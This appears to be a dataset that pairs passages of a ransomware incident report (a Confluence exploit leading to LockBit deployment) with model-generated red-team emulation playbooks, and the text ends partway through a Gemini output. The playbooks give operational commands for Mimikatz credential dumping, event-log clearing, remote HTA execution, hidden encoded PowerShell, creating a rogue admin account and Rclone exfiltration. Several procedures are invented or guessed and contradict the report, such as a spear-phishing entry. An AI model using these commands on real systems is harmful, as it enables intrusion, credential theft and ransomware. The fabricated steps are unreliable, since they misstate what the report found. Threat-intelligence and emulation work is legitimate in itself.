Technique: Data Transfer to Cloud Storage Tool Used: Rclone Procedure: Exfiltrated data from the file server.
Credential AccessMimikatz was executed on the beachhead host just 20 minutes after initial access was performed. This was visiblein the memory on the host as Anydesk wrote the file to disk. Sysmon event code 1 showed the execution of Mimikatz: Sysmon event code 10 showed that Mimikatz accessed the LSASS process, and we can also see subsequentGrantedAccess for Mimikatz 0x1010 , which translates to: PROCESS_QUERY_LIMITED_INFORMATION(0x1000) and PROCESS_VM_READ (0x0010) . Sysmon event code 11 shows that the Mimikatz process creates a file called passwords.txt: Finally, the threat actor reviewed the captured passwords by opening the newly generated password file in Notepad,as documented in Sysmon event code 1: The threat actor also ran the script Veeam-Get-Creds-New.ps1 on the backup server: Powershell scripts are logged under event code 4104 if powershell script block logging is enabled:	Phase: Credential Access Technique: Credential Dumping (Mimikatz) Procedure: Mimikatz was executed on the beachhead host. Indicators: Sysmon Event Code 1: Execution of Mimikatz. Sysmon Event Code 10: Accessed LSASS process with rights PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and PROCESS_VM_READ (0x0010). Sysmon Event Code 11: Mimikatz created a file called `passwords.txt`. Follow-up Action: The threat actor reviewed the captured passwords using Notepad. Phase: Credential Access Technique: Credential Dumping via PowerShell Procedure: Execution of script on backup server. Script Name: `Veeam-Get-Creds-New.ps1` Indicators: PowerShell Event Code 4104: Logged execution if script block logging is enabled.
The script looks to be from the sadshade/veam-creds GitHub repository, and the script tries to get credentials fromthe Veeam credential manager.The threat actor also discovered a txt file on a file share server that contained IT-related cleartext passwords.Included were the credentials for a Domain Admin account. Through their RDP session, they proceeded withopening the the txt file using Notepad. Illustrated below via the process execution evidence: DiscoveryThe following commands were executed via the Confluence RCE:net userwhoamiquery user From the Meterpreter session, tasklist was used to enumerate the running processes. This threat actor identified C2processes that were established by a different actor and used ‘taskkill’ to end them. During this task, we noticed a threat actor blunder: the ‘taskkill’ execution on ‘powershell.exe’ killed their ownMeterpreter session. Consequently, they re-exploited Confluence to establish yet another Meterpreter session.Then, further discovery commands were executed on the host:query usernet userhostnameipconfig NetScan was then utilized to enumerate the local network:	Phase: Initial Access Technique: Exploitation of Remote Services (Confluence RCE) Procedure: The attacker exploited a Confluence Remote Code Execution vulnerability to gain initial access. Phase: Discovery Technique: System Network Configuration Discovery Command: `ipconfig` Technique: System Owner/User Discovery Commands: `whoami` `query user` Technique: Account Discovery Command: `net user` Technique: Network Service Scanning Tool: NetScan Phase: Execution Technique: Remote Code Execution (RCE) Procedure: Re-exploited Confluence after terminating their own session by mistake. Phase: Credential Access Technique: Credential Dumping Procedure: Retrieved credentials from Veeam credential manager and identified cleartext passwords in a txt file on a file share. Tool: Meterpreter for interaction, such as executing `tasklist`. Phase: Defense Evasion Technique: Process Termination Command: `taskkill` on unwanted C2 processes and inadvertently on `powershell.exe`. Phase: Persistence Technique: Remote Desktop Protocol (RDP) Procedure: Used RDP session to open a txt file containing credentials using Notepad.
When NetScan is executed with the ‘Check for write access’ option enabled, a ‘delete.me’ file is created then deletedon discovered shares. We can observe this in Event ID 5145: After moving to a Domain Controller, ‘query user’ was once again executed. Then the Domain Admins group wasenumerated, after a typo: Lateral MovementThroughout the intrusion, RDP was used for lateral movement. The ‘Remote Desktop Connection’ app (mstsc.exe)was used on the Confluence beachhead to interactively logon to targeted hosts in the environment. The Event ID4624 logon activity: Lateral movement with RDP was done to different hosts in swift succession. Starting under one hour after theinitial compromise of the beachhead host. All RDP was performed from the beachhead. CollectionThe threat actor used Rclone to exfiltrate everything in a file share, see ‘Exfiltration‘ for more details. However,there were a few groups of files that were copied to C:\temp on the beachhead and then deleted about 30 secondslater.	Phase: Discovery Technique: Network Share Discovery Procedure: NetScan was used with the 'Check for write access' option enabled, which creates and then deletes a ‘delete.me’ file on discovered shares. Phase: Execution Technique: System Information Discovery Command: `query user` executed on a Domain Controller to gather user session information. Phase: Credential Access Technique: Account Discovery Command: Enumeration of the Domain Admins group was attempted, though the report notes there was a typo in the command. Phase: Lateral Movement Technique: Remote Desktop Protocol (RDP) Procedure: The `mstsc.exe` application (Remote Desktop Connection) was used from the Confluence beachhead to log on interactively to targeted hosts in the environment for lateral movement. Phase: Collection Technique: Data Staging Procedure: Files were copied to `C:\temp` on the beachhead, then deleted after about 30 seconds. Phase: Exfiltration Technique: Data Transfer Tools Procedure: Rclone was used to exfiltrate data from a file share.
Command and ControlMetasploitCommand and control (C2) connections were established via Metasploit from the breached Confluence server tothe IP address 92.51.2[.]22 which is hosted in the provider called Flyservers S.A., reported in other blogs for beingused by LockBit affiliates. The connections were made to the port 4321. When downloading the Meterpreter HTA stager, the threat actor downloaded it by using a user-agent associatedwith Internet Explorer. AnyDeskA second C2 server 92.51.2[.]27 was employed to connect to AnyDesk. Through Fofa, it was possible to identify the hostname, WIN-EKIHV2OQQP8, associated with the server in theperiod related to the incident. This hostname was observed in the login activity on the beachhead host for this intrusion. The hostname can be traced through the certificate on the RDP service (port 3389), valid since the end of October2023.	Phase: Command and Control Technique: C2 Communication using Metasploit Procedure: The threat actor uses Metasploit to establish command and control connections from the breached Confluence server. Port: 4321 Procedure: The threat actor downloaded the Meterpreter HTA stager using a user-agent associated with Internet Explorer. Technique: Remote Access Tool (AnyDesk) for C2 Procedure: The threat actor employed AnyDesk to establish a second C2 communication channel. Context: The connection was made to a server with the hostname WIN-EKIHV2OQQP8, associated with the incident's timeline. These procedures focus on leveraging Metasploit and AnyDesk for maintaining command and control over the compromised environment.
By searching for this hostname in fofa.info, it was possible to identify multiple IP addresses that were associatedwith malicious activities in VirusTotal in the past, some examples in the following image. The same hunt on Censys allowed us to identify six IP addresses which were potentially associated with theShadowSyndicate ransomware group based on a tweet made by @JRehbergCSK. Some of the identified IP addresses like 194.165.16[.]60 and 45.227.252[.]227 were also mentioned in a Group-IBReport about ShadowSyndicate.The AnyDesk connection was utilized to drop tools to enumerate the infrastructure, access credentials and exfiltrateand encrypt data. ExfiltrationJust one hour and eleven minutes after initial access the threat actor started exfiltration activity. This was donefrom a file share server, performed with Rclone and exfiltrated to mega (Mega.nz). We have previously reported onthe usage of rclone several times. We were able to retrieve the Rclone configuration file used: As shown above the configuration file is encrypted and password protected. Fortunately the threat actor had badopsec and reused a password so we were able to decrypt the file using the “rclone config show” command: From Zeek network logs we see data being exfiltrated:	Phase: Initial Access Technique: Remote Access Tool Deployment Procedure: The attacker used AnyDesk to gain access to the victim's infrastructure. Phase: Discovery Technique: Network and System Discovery Tool: Enumeration tools were deployed via AnyDesk to map out the infrastructure and access credentials. Phase: Exfiltration Technique: Data Transfer to Cloud Storage Tool: Rclone Procedure: Data was exfiltrated from a file share server to Mega.nz using Rclone. Phase: Configuration and Execution Command: `rclone config show` Purpose: To decrypt and display the Rclone configuration file used for exfiltration.
The next deployment process began with PDQ Deploy being executed from the beachhead system. Organizationscan utilize the PDQ Deploy to remotely and efficiently create multi-step deployments for end users, supportingvarious formats such as .exe, .msi, .bat, .ps1, and .vbs. PDQ Deploy allows administrators to execute scripts andcommands (e.g., PowerShell, VBScript, and batch files) on remote computers and groups integrated withSpiceworks, Active Directory, or PDQ Inventory. The tool also provides deployment reports to monitor and tracksuccessful deployments.PDQ Deploy operates through two Windows services:PDQDeployService.exe is the background service that manages all schedules and deployments on the console.PDQDeployRunner-n (e.g., PDQDeployRunner-1) is the target service executed on remote hosts to perform thedeployments.During deployment, the target service and installation files for the deployment package are copied to a directory onthe target computer’s default share, enabling the execution of deployment tasks. To facilitate the ransomware deployment with PDQ the threat actor created a file called asd.bat to launch theLockBit executable. asd.bat content: We were able collect the PDQ .db files from C:\ProgramData\Admin Arsenal\PDQ Deploy\ on the beachhead to seethe deployment data created by the threat actor.	Phase: Execution Technique: Remote Execution Using PDQ Deploy Procedure: The threat actor used PDQ Deploy to remotely execute deployment tasks on target systems. Executed Programs: `PDQDeployService.exe`: Manages schedules and deployments. `PDQDeployRunner-n`: Executes deployments on target hosts. Phase: Delivery Technique: Batch Script Execution Command: Execution of a batch file `asd.bat` to launch the ransomware executable. Phase: Impact Technique: Ransomware Deployment Command: Utilizing the batch script `asd.bat` to execute the LockBit ransomware payload on target systems. Additional Details Tools Used: PDQ Deploy for creating and managing multi-step deployments. Deployment Monitoring: Utilized PDQ deployment reports to track successful deployment processes.
Suricata was also alerting on the activity: From the network traffic we see HTTP posts done with rclone: ImpactAfter around two hours into the intrusion, the threat actor transferred PDQ Deploy and the LockBit Blackexecutable, under the C:\Temp folder on the beachhead host. The same files were then also created on the domaincontroller. PDQ Deploy is a software tool designed for automating patch management and deploying applications.In this case, it was leveraged to facilitate the deployment of the LockBit ransomware. Before the threat actor used PDQ they first ran the LockBit binary manually over RDP sessions on the back serverand file server.	Phase: Initial Access Technique: Rclone for Data Transfer Command: Usage of `rclone` to perform HTTP POST requests, likely similar to: `rclone copy <source> <destination>` Phase: Execution Technique: Manual Execution via RDP Procedure: The threat actor manually executed the LockBit ransomware binary on the back server and file server using RDP sessions. Phase: Lateral Movement / Deployment Technique: Automated Software Deployment (PDQ Deploy) Procedure: Transfer PDQ Deploy tool and LockBit executable to the C:\Temp folder on the beachhead host. Deploy the same files to the domain controller, leveraging PDQ Deploy to facilitate the dissemination of the ransomware. Phase: Impact Technique: Ransomware Deployment Procedure: Execution of the LockBit ransomware to encrypt files on targeted systems.
Threat actor logged in via their ‘backup’ user: Domain Admin User/Credentials used to deploy: Files included in PDQ library: Several runs of the deployment package by the threat actor: Several ways to attempt to execute the ransomware including calling the file, command arguments, and finally thebatch file: Once the threat actor started the deployment we observed both PDQ service runners and the package files(ransomware and batch file) being deployed over SMB. This batch file was then executed on hosts across the environment via the PDQ runner. After completing the deployment using PDQ, the threat actor connected to an Exchange server using RDP. They issued a few commands to stop running processes associated with Exchange and SQL on the server:process net stop MSExchangeUMprocess taskkill /f /im sql*They then dropped a batch file, test.bat, which contained a list of the systems found earlier during the intrusion, aswell as a ransomware execution command. This appears to have been a backup to try and hit systems that may havebeen missed during the PDQ deployment. Below is an extract of the test.bat contents:	Phase: Initial Access Technique: Compromise via Backup User Procedure: The threat actor logged in using a 'backup' user account with domain admin credentials. Phase: Execution Technique: PDQ Deployment Procedure: Deployed ransomware using PDQ by executing deployment packages over SMB. Phase: Lateral Movement Technique: RDP to Exchange Server Command: Connected via RDP to stop processes on Exchange and SQL servers. Commands: `net stop MSExchangeUM` `taskkill /f /im sql` Phase: Impact Technique:* Ransomware Execution Procedure: Executed the batch file using PDQ runner. Procedure: Dropped and executed `test.bat` to target additional systems. Phase: Persistence Technique: Batch File Deployment Procedure: Created batch file `test.bat` with a list of systems and a command to execute ransomware, as a backup method to ensure wide deployment.
Computedasd.bat438448FDC7521ED034F6DABDF814B6BAF08E7343A94897ADEAE78138CC3F9142ED160A031E2E25A996F72089F12755F931E7FCA9B64DD85B03A56A9871FD6BB8F2CF1DBBnetscan.exeD7ADDB5B6F55EAB1686410A17B3C867BA54AF16B2702FE0E5C569F6D8F17574A9FDAF197498BA0AFA5D3B390F852AF66BD6E763945BF9B6BFF2087015ED8612A18372155test.bat9D495530A421A7C7E113B7AFC3A5050402D291E2FF5799A13EACC72AD0758F2C5E69D414594F2F8AB05F88F765D05EB1CF24E4C697746905A61ED04A6FC2B744DD6FEBB0Veeam-Get-Creds-New.ps13BD63B2962D41D2E29E570238D28EC0E9537E1C4E5DDD7FB9B98C532CA89A9DB08262AB47AA8E510B9C3B5D39F84E4C2FA68C81DA888E091436FDB7FEE276EE7FF87F016BehavioralLSASS Memory - T1003.001System Network Configuration Discovery - T1016Remote System Discovery - T1018Remote Desktop Protocol - T1021.001System Owner/User Discovery - T1033Network Service Discovery - T1046Process Discovery - T1057PowerShell - T1059.001Windows Command Shell - T1059.003Clear Windows Event Logs - T1070.001Software Deployment Tools - T1072Ingress Tool Transfer - T1105Exploit Public-Facing Application - T1190System Binary Proxy Execution: Mshta - T1218.005Remote Access Software - T1219Data Encrypter for Impact - T1486Credentials In Files - T1552.001Exfiltration to Cloud Storage - T1567.002	Phase: Initial Access Technique: Exploit Public-Facing Application Procedure: The attacker exploits a vulnerability in a public-facing application to gain access. Phase: Execution Technique: PowerShell Execution Command: Likely use of `powershell -ExecutionPolicy Bypass -NoProfile -Command <script>` Technique: Windows Command Shell Command: Likely use of `cmd.exe /c <command>` Technique: System Binary Proxy Execution: Mshta Command: Likely use of `mshta <URL or script>` Phase: Persistence Technique: Remote Access Software Procedure: Installation of remote access software for persistence. Phase: Privilege Escalation Technique: LSASS Memory Dump (T1003.001) Procedure: Use Mimikatz or similar tool to dump credentials from LSASS. Phase: Defense Evasion Technique: Clear Windows Event Logs Command: Likely use of `wevtutil cl <log_name>` Phase: Credential Access Technique: Credentials In Files Procedure: Use scripts like `Veeam-Get-Creds-New.ps1` to extract credentials from files. Phase: Discovery Technique: System Network Configuration Discovery Command: Execute `netscan.exe` for network discovery. Technique: Remote System Discovery Procedure: Use RDP (Remote Desktop Protocol) for remote system access. Technique: System Owner/User Discovery Command: Execute `whoami` or similar command. Technique: Network Service Discovery Procedure: Use of network scanning tools such as `netscan.exe`. Technique: Process Discovery Command: Likely use of `tasklist` to enumerate running processes. Phase: Lateral Movement Technique: Software Deployment Tools Procedure: Use deployment tools to distribute malware or scripts to other machines. Phase: Collection Technique: Ingress Tool Transfer Procedure: Transfer of files/tools using PowerShell or other scripts. Phase: Exfiltration Technique: Exfiltration to Cloud Storage Procedure: Use cloud APIs or tools to exfiltrate data. Phase: Impact Technique: Data Encrypter for Impact Procedure: Encryption of data files to disrupt availability.
After the ransomware attack was completed, the affected files were renamed with the .rhddiicoE extension, and aransom note titled rhddiicoE.README.txt was left on the compromised hosts. Additionally, the desktop background image was modified as part of the ransomware execution. Timeline Diamond Model IndicatorsAtomic92[.]51.2.2292[.]51.2.27	Phase: Initial Access Technique: Spear Phishing Attachment Procedure: An email containing a malicious attachment was used to gain initial access to the system. Phase: Execution Technique: Malicious Document Execution Procedure: The malicious document, once opened, executed embedded scripts or macros to begin the infection chain. Phase: Privilege Escalation Technique: Exploit OS Vulnerability Procedure: The threat actor exploited a known OS vulnerability to gain elevated privileges (not explicitly detailed in the report). Phase: Ransomware Deployment Technique: File Encryption Procedure: The ransomware encrypted user files, appending the `.rhddiicoE` extension to each file. Technique: User Notification Procedure: A ransom note named `rhddiicoE.README.txt` was placed on the compromised hosts. Technique: System Modification Procedure: The desktop background image was modified as part of the ransomware execution to possibly display extortion information or instructions. Phase: Impact Technique: Data Encrypted for Impact Procedure: The attack rendered files inaccessible by encrypting them with a strong encryption algorithm.
Create or Modify System Process: Windows Service - T1543.003Valid Accounts: Local Accounts - T1078.003DetectionsNetworkET ATTACK_RESPONSE PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell StagersET EXPLOIT Atlassian Confluence RCE Attempt Observed (CVE-2023-22527) M1ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dlET HUNTING PE EXE Download over raw TCPET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1ET INFO Dotted Quad Host HTA RequestET INFO User-Agent (python-requests) Inbound to WebserverET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)ET POLICY Possible HTA Application DownloadET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199ET WEB_CLIENT PowerShell call in script 1ET WEB_CLIENT PowerShell call in script 2ET WEB_SERVER Possible SQL Injection (exec) in HTTP Request BodyET WEB_SERVER WebShell Generic - net userET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M1ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M2ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2ETPRO ATTACK_RESPONSE Possibly Malicious VBScript Executing WScript.Shell Run M1ETPRO HUNTING Observed Suspicious Base64 Encoded Wide String Inbound (zip)ETPRO HUNTING Suspicious Offset PE EXE or DLL Download on Non-Standard PortsETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTPETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP 1 M2SigmaSearch rules on detection.fyi or sigmasearchengine.comDFIR Public Rules Repo:8a0d153f-b4e4-4ea7-9335-892dfbe17221 : NetScan Share Enumeration Write Access CheckDFIR Private Rules:1aafd4cc-cb38-498b-9365-394f71fd872c : Veeam Credential Dumping Script (PSH)8a64fe8d-e9d5-4c8c-9716-0ceed9b3b791 : Notepad Password Files Discovery	Phase: Initial Access Technique: Exploitation of Vulnerability (CVE-2023-22527, CVE-2023-22515, CVE-2023-22518) Procedure: Exploiting vulnerabilities in Atlassian Confluence to gain access. Phase: Execution Technique: PowerShell Execution Command: `powershell -NoProfile -WindowStyle Hidden -EncodedCommand <Base64 Payload>` Procedure: Typical in PowerShell stagers to execute payloads covertly. Phase: Persistence Technique: Create or Modify System Process: Windows Service Procedure: Likely modification or creation of a Windows service for maintaining access. Phase: Credential Access Technique: Credential Dumping Procedure: Use of Veeam Credential Dumping Script to obtain credentials using PowerShell. Possible Command: `Get-VeeamCredentialDump.ps1` Phase: Lateral Movement Technique: Valid Accounts: Local Accounts Procedure: Use of compromised local account credentials for lateral access. Phase: Command and Control Technique: Web Shell Procedure: Deployment of a web shell to maintain persistent access and command execution. Command Example: `net user` Phase: Impact Technique: Data Exfiltration Procedure: Downloading executables over non-standard ports. Additional Reconnaissance Techniques Procedure: NetScan Share Enumeration for checking write access. Exploitation Techniques Technique: HTA (HTML Application) Usage Procedure: Download and execution of HTA files using MSXMLHTTP download related to CVE-2017-0199. Command Example: HTA file containing `Wscript.Shell` calls. This structured outline enables a red team to emulate the sequence of actions and tools used by the threat actor based on the provided CTI report.
b878e8c2-bfa5-4b1d-8868-a798f57d197a : Veeam Credential Dumping Script Execution53c4b596-8af3-42f3-a974-bddfbf6db731 : Wevtutil.exe Log Clearing Process Execution516c6fbc-949a-4aa7-8727-c041aee56dc0 : Execution of Remote HTA File via mshta.exe8a64fe8d-e9d5-4c8c-9716-0ceed9b3b791 : Notepad Password Files Discovery3a9897de-164a-4b5a-8995-ffdc301d6f6d : Confluence Executing Suspicious Commands7019b8b4-d23e-4d35-b5fa-192ffb8cb3ee : Use of Rclone to exfiltrate data over an SSH channel62047536-b23d-4aef-af94-b6095aea1617 : Data Exfiltration Using Rclone with Cloud StorageSigma Repo:cd951fdc-4b2f-47f5-ba99-a33bf61e3770 : Always Install Elevated Windows Installere32d4572-9826-4738-b651-95fa63747e8a : Base64 Encoded PowerShell Command Detected7d9263bd-dc47-4a58-bc92-5474abab390c : Change Winevt Channel Access Permission Via Registry2f78da12-f7c7-430b-8b19-a28f269b77a3 : Disable Windows Event Logging Via Registryfcddca7c-b9c0-4ddf-98da-e1e2d18b0157 : Disabled Windows Defender Eventlog61065c72-5d7d-44ef-bf41-6a36684b545f : Elevated System Shell Spawned98767d61-b2e8-4d71-b661-e36783ee24c1 : Gzip Archive Decode Via PowerShella642964e-bead-4bed-8910-1bb4d63e3b4d : HackTool - Mimikatz Execution502b42de-4306-40b4-9596-6f590c81f073 : Local Accounts Discoveryf26c6093-6f14-4b12-800f-0fcb46f5ffd0 : Malicious Base64 Encoded PowerShell Keywords in Command Lines183e7ea8-ac4b-4c23-9aec-b3dac4e401ac : Net.EXE Executioncd219ff3-fa99-45d4-8380-a7d15116c6dc : New User Created Via Net.EXEf4bbd493-b796-416e-bbf2-121235348529 : Non Interactive PowerShell Process Spawnedd679950c-abb7-43a6-80fb-2a480c4fc450 : PDQ Deploy Remote Adminstartion Tool Executiond7bcd677-645d-4691-a8d4-7a5602b780d1 : Potential PowerShell Command Line Obfuscation8e0bb260-d4b2-4fff-bb8d-3f82118e6892 : Potentially Suspicious CMD Shell Output Redirectfdb62a13-9a81-4e5c-a38f-ea93a16f6d7c : PowerShell Base64 Encoded FromBase64String Cmdlet3b6ab547-8ec2-4991-b9d2-2b06702a48d7 : PowerShell Download Pattern6e897651-f157-4d8f-aaeb-df8151488385 : PowerShell Web Download86085955-ea48-42a2-9dd3-85d4c36b167d : Process Terminated Via Taskkillb52e84a3-029e-4529-b09b-71d19dd27e94 : Remote Access Tool - AnyDesk Executionb98d0db6-511d-45de-ad02-e82a98729620 : Remotely Hosted HTA File Executed Via Mshta.EXE2aa0a6b4-a865-495b-ab51-c28249537b75 : Startup Folder File Write88872991-7445-4a22-90b2-a3adadb0e827 : Stop Windows Service Via Net.EXE590a5f4c-6c8c-4f10-8307-89afe9453a9d : Suspicious Child Process Created as System7be5fb68-f9ef-476d-8b51-0256ebece19e : Suspicious Execution of Hostnamefb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base645cb299fc-5fb1-4d07-b989-0644c68b6043 : Suspicious File Download From IP Via Curl.EXEd75d6b6b-adb9-48f7-824b-ac2e786efe1f : Suspicious FromBase64String Usage On Gzip Archive - Process Creation03cc0c25-389f-4bf8-b48d-11878079f1ca : Suspicious MSHTA Child Process	Phase: Credential Access Technique: Credential Dumping via Veeam Procedure: Execution of a script to dump credentials from Veeam. Technique: Mimikatz Execution Command: `mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit` Phase: Defense Evasion Technique: Clearing Logs Command: `wevtutil.exe cl <LogName>` Technique: Disable Windows Event Logging Command: Modifications made via registry to disable logging. Technique: PowerShell Obfuscation Command: Base64 encoding used in PowerShell commands to obscure content. Technique: Registry Modification Command: Changed Winevt channel access permissions via registry. Technique: Modify Windows Defender Logs Procedure: Windows Defender logs disabled. Phase: Execution Technique: HTA Execution via MSHTA Command: `mshta.exe <URL>` Technique: PowerShell Execution Command: Execution of Base64 encoded PowerShell commands. Phase: Persistence Technique: Startup Folder File Write Procedure: Files written to the startup folder for persistence on system boot. Phase: Discovery Technique: Local Accounts Discovery Command: `net.exe user` Technique: Password Files Discovery Procedure: Searching within Notepad for password files. Phase: Privilege Escalation Technique: Elevated System Shell Procedure: Command executed to spawn an elevated system shell. Phase: Lateral Movement Technique: Scheduled Task/Job Procedure: Tasks used to schedule recurring execution. Technique: PDQ Deploy for Remote Administration Procedure: Leveraged PDQ Deploy to execute remote administration tasks. Phase: Collection Technique: Data Exfiltration with Rclone Command: Rclone used to exfiltrate data over an SSH channel and cloud storage services. Phase: Exfiltration Technique: Use of Rclone for Data Transfer Command: `rclone copy <source> <destination> --ssh` Phase: Command and Control Technique: Remote Access Tool Execution Command: Execution of AnyDesk for remote access. Phase: Impact Technique: Task Killing Command: `taskkill /f /im <ProcessName>` This structured procedure should aid a red team in emulating the described attack techniques effectively.
754ed792-634f-40ae-b3bc-e0448d33f695 : Suspicious PowerShell Parent Process2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 : Suspicious SYSTEM User Process Creation63332011-f057-496c-ad8d-d2b6afb27f96 : Suspicious Tasklist Discovery Commandce72ef99-22f1-43d4-8695-419dcb5d9330 : Suspicious Windows Service Tamperingd0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6 : Unusually Long PowerShell CommandLinee28a5a99-da44-436d-b7a0-2afc20a5f413 : Whoami Utility Execution8de1cbe8-d6f5-496d-8237-5f44a721c7a0 : Whoami.EXE Execution Anomaly79ce34ca-af29-4d0e-b832-fc1b377020db : Whoami.EXE Execution From Privileged Process671bb7e3-a020-4824-a00e-2ee5b55f385e : WMI Module Loaded By Uncommon ProcessYaraBINARYALERT_Hacktool_Windows_Mimikatz_CopywriteBINARYALERT_Hacktool_Windows_Mimikatz_FilesELASTIC_Windows_Trojan_Metasploit_38B8CeecELASTIC_Windows_Trojan_Metasploit_47F5D54AELASTIC_Windows_Trojan_Metasploit_4A1C4Da8ELASTIC_Windows_Trojan_Metasploit_7Bc0F998ELASTIC_Windows_Trojan_Metasploit_C9773203GODMODERULES_IDDQD_God_Mode_RuleSECUINFRA_SUSP_Powershell_Base64_DecodeSIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1SIGNATURE_BASE_Msfpayloads_Msf_RefSIGNATURE_BASE_Powershell_Susp_Parameter_ComboMAL_RANSOM_LockBit_Apr23_1MAL_RANSOM_LockBit_ForensicArtifacts_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1ELASTIC_Windows_Ransomware_Lockbit_369E1E94CRAIU_Crime_Lockbit3_RansomwareMITRE ATT&CK	Phase: Execution Technique: PowerShell Execution Command: An unusually long PowerShell command line was used. Likely involved obfuscation or Base64 encoding: Example: `powershell -ExecutionPolicy Bypass -NoProfile -EncodedCommand <Base64Payload>` Phase: Discovery Technique: System Information Discovery Procedure: Execution of `whoami` commands to gather user and permission information. Likely commands: `whoami` `whoami /priv` Technique: Process Discovery Command: Execution of `tasklist` to enumerate processes: `tasklist` Phase: Persistence Technique: Windows Service Tampering Procedure: Modification or creation of Windows services for persistence. Phase: Credential Access Technique: Credential Dumping Using Mimikatz Command: Execution of Mimikatz for extracting credentials: `mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit` Phase: Lateral Movement Technique: Windows Management Instrumentation (WMI) Procedure: Use of WMI for remote code execution on multiple hosts. Phase: Impact Technique: Ransomware Deployment (LockBit) Procedure: Execution of ransomware for file encryption. Specific techniques might include: Encrypting files via automated scripts Executing ransomware binary Additional Tools Tool: Metasploit Used for payload generation and exploitation. Tool: Yara Rules Detection through custom Yara rules indicating Mimikatz and Metasploit activity. Note: Command details like encoded PowerShell commands are inferred based on common tactics.

Gemini 2.0

Gemini 2.0
Model: gemini-2.0-flash OK. Here's the structured output of the procedures used by the threat actor, based on the provided CTI report, tailored for red team emulation. Phase: Initial Access Technique: Exploit Public-Facing Application (CVE-2023-22527) - T1190 Procedure: Exploitation of a server-side template injection vulnerability (CVE-2023-22527) in an exposed Atlassian Confluence server by injecting OGNL expressions to execute commands. Phase: Discovery Technique: System Network Configuration Discovery - T1016 Command: `net user` Command: `whoami` Command: `query user` Technique: Process Discovery - T1057 Command: `tasklist` Technique: System Owner/User Discovery - T1033 Command: `query user` Technique: Network Service Discovery - T1046 Command: `ipconfig` Technique: SoftPerfect Network Scanner Phase: Execution & Persistence Technique: System Binary Proxy Execution: Mshta - T1218.005 Command: `mshta <http address>/UsySLX1n.hta` Technique: PowerShell - T1059.001 Command: `powershell.exe -nop -w hidden -e <Base64 encoded payload>` Technique: Remote Access Software - T1219 Procedure: The attacker then leveraged it to successfully download and install AnyDesk. Once installed, AnyDesk was configured with a preset password, providing the threat actor with persistent remote access. Technique: Windows Service - T1543.003 Command: `powershell -c (New-Object Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.msi','AnyDesk.msi')` Technique: Create Account T1136 Command: `net user backup <password> /add` Command: `net localgroup "Administrators" backup /add` Phase: Defense Evasion Technique: Clear Windows Event Logs - T1070.001 Command: `Foreach-Object {wevtutil cl "$_"}` Procedure: Deleting mimikatz and rclone using windows explorer Phase: Credential Access Technique: LSASS Memory - T1003.001 Command: `mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit` Technique: Credentials In Files - T1552.001 Procedure: Veeam credential dumping using Veeam-Get-Creds-New.ps1 Phase: Lateral Movement Technique: Remote Desktop Protocol - T1021.001 Procedure: RDP lateral movement to target servers. Phase: Collection Technique: PDQ Deploy Technique:Ingress Tool Transfer - T1105 Procedure: Copied LBB.exe and ASD.bat to victim servers Technique: Software Deployment Tools - T1072 Procedure: Execute LBB.exe using command: `cmd /k "<C:\\temp\\LBB.exe> -path \\\\<server_name>"` Technique: PowerShell - T1059.001 Procedure: Execute test.bat script using cmd to encrypt the computers. Phase: Command and Control Technique: Remote Access Software - T1219 Procedure: AnyDesk for command and control. Phase: Exfiltration Technique: Exfiltration to Cloud Storage - T1567.002 Procedure: Rclone was configured and then used to exfiltrate sensitive data to mega.nz Phase: Impact Technique: Data Encrypter for Impact - T1486 Procedure: LockBit ransomware was executed manually over RDP sessions or through the PDQ deployment.

Model: gemini-2.0-flash

OK. Here's the structured output of the procedures used by the threat actor, based on the provided CTI report, tailored for red team emulation.

Phase: Initial Access

Technique: Exploit Public-Facing Application (CVE-2023-22527) - T1190
Procedure: Exploitation of a server-side template injection vulnerability (CVE-2023-22527) in an exposed Atlassian Confluence server by injecting OGNL expressions to execute commands.

Phase: Discovery

Technique: System Network Configuration Discovery - T1016
Command: net user
Command: whoami
Command: query user
Technique: Process Discovery - T1057
Command: tasklist
Technique: System Owner/User Discovery - T1033
Command: query user
Technique: Network Service Discovery - T1046
Command: ipconfig
Technique: SoftPerfect Network Scanner

Phase: Execution & Persistence

Technique: System Binary Proxy Execution: Mshta - T1218.005
Command: mshta <http address>/UsySLX1n.hta
Technique: PowerShell - T1059.001
Command: powershell.exe -nop -w hidden -e <Base64 encoded payload>
Technique: Remote Access Software - T1219
Procedure: The attacker then leveraged it to successfully download and install AnyDesk. Once installed, AnyDesk was configured with a preset password, providing the threat actor with persistent remote access.
Technique: Windows Service - T1543.003
Command: powershell -c (New-Object Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.msi','AnyDesk.msi')
Technique: Create Account T1136
Command: net user backup <password> /add
Command: net localgroup "Administrators" backup /add

Phase: Defense Evasion

Technique: Clear Windows Event Logs - T1070.001
Command: Foreach-Object {wevtutil cl "$_"}
Procedure: Deleting mimikatz and rclone using windows explorer

Phase: Credential Access

Technique: LSASS Memory - T1003.001
